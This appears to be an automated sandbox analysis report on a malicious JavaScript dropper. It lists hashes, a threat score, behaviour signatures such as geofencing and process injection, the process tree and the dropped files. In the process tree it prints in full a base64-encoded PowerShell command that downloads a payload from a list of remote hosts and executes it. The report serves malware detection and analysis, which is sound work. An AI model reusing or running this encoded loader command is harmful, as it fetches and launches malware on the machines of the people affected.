Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/05/2023, 11:43

General

  • Target

    WoomerasShtetel.js

  • Size

    201KB

  • MD5

    9b94a2b7783fa1bfc2bc7ec1545699ae

  • SHA1

    3a670d1a54de1b5083429ccaba51c2cb57ca7247

  • SHA256

    84e4c206954f13f07127e40e76dc6754f4d729e56f6b5ec8ee045a714003814d

  • SHA512

    227eec9f1f49921c35c9f3b3fafe4223e571a1d457703b9c0ca0aa129e8339910376ff7d91f6f3f158e5126cf3bdbf83957b77980356877347e0f497c3e0a8d6

  • SSDEEP

    3072:qlUer9g0dXr4l1qDvatIVFcWwblWrj6/ns5JoDXn0PnH:qyeRgdDqDvatIVifQJorKH

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\WoomerasShtetel.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4460
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\ProgramData\diversityCourtby.js" isohelNoncumulatively Blackmailers storified thyrotomy
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:5012
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3136

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\diversityCourtby.js

          Filesize

          201KB

          MD5

          9b94a2b7783fa1bfc2bc7ec1545699ae

          SHA1

          3a670d1a54de1b5083429ccaba51c2cb57ca7247

          SHA256

          84e4c206954f13f07127e40e76dc6754f4d729e56f6b5ec8ee045a714003814d

          SHA512

          227eec9f1f49921c35c9f3b3fafe4223e571a1d457703b9c0ca0aa129e8339910376ff7d91f6f3f158e5126cf3bdbf83957b77980356877347e0f497c3e0a8d6

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jfpmnhqt.rw0.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/3136-136-0x000001C81EB60000-0x000001C81EB70000-memory.dmp

          Filesize

          64KB

        • memory/3136-135-0x000001C81EB30000-0x000001C81EB52000-memory.dmp

          Filesize

          136KB

        • memory/3136-137-0x000001C81EB60000-0x000001C81EB70000-memory.dmp

          Filesize

          64KB

        • memory/3136-147-0x000001C81EB60000-0x000001C81EB70000-memory.dmp

          Filesize

          64KB

        • memory/3136-148-0x000001C81EB60000-0x000001C81EB70000-memory.dmp

          Filesize

          64KB

        • memory/3136-149-0x000001C81EB60000-0x000001C81EB70000-memory.dmp

          Filesize

          64KB

        • memory/3136-150-0x000001C81EB60000-0x000001C81EB70000-memory.dmp

          Filesize

          64KB